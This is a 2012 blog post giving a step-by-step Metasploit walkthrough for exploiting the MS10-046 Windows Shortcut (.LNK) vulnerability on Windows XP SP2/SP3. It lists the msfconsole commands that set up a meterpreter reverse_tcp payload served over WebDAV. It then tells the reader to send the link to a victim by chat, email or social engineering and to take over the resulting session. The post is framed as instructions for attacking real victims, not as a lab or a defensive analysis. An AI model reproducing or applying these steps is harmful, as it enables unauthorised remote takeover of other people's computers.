Why don't you help Animal?

Saturday, September 29, 2012

Hack Windows XP using Shell Link Code Execution

This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Msf exploit(ms10_046_shortcut_icon_dllloader)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_046_shortcut_icon_dllloader)>set lhost 192.168.1.6(IP of Local Host)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set srvhost 192.168.1.6(This must be an address on the local machine)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set uripath /(The Url to use for this exploit)

Msf exploit (ms10_046_shortcut_icon_dllloader)>exploit

Now an URL you should give to your victim http://192.168.1.6/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

No comments:

Post a Comment

UA-35960349-1